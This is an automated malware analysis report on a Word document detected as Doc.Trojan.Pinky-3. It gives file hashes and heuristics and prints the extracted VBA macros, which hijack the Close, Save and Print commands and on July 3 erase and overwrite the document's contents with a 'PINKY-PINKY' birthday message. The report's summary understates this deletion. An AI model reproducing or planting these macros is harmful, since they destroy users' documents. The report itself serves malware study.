Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 88c94cdfa662e4d8…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 2000-04-09 04:30:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 048571fc49380129e96b6fd599bb3de1
SHA-1: ee7e81c12ee18c0ea96e358cff55018acb960bfe
SHA-256: 88c94cdfa662e4d8b9e99fb5b565b6b9f903e7d3f744663cb96ea6282f8e2f58
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Pinky-3'. It contains VBA macros that execute when the document is opened. The macro checks if the current date is July 3rd, and if so, it displays a specific message ('PINKY-PINKY' and a birthday wish) before closing the document. This behavior suggests a potentially customized or time-based lure, though no further malicious actions like network communication or file dropping were observed.

Heuristics (2)

  • ClamAV: Doc.Trojan.Pinky-3 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Pinky-3
  • VBA macros detected (medium; OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3742 bytes
SHA-256: aca3dd22177e8d56cf69d7861226222a901719bfb580fb831d66336104ad5966
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArchivoCerrar"
Public Sub ArchivoCerrar()
'
' ArchivoImprimir Macro
' Prints the active Microsoft Word document.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.Close
End If
End Sub


Attribute VB_Name = "ArchivoGuardar"
Public Sub ArchivoGuardar()
'
' ArchivoImprimir Macro
' Prints the active Microsoft Word document.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.Save
End If
End Sub


Attribute VB_Name = "ArchivoImprimir"
Public Sub ArchivoImprimir()
Attribute ArchivoImprimir.VB_Description = "Imprime el documento activo de Microsoft Word."
Attribute ArchivoImprimir.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.ArchivoImprimir"
'
' ArchivoImprimir Macro
' Prints the active Microsoft Word document.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.PrintOut
End If
End Sub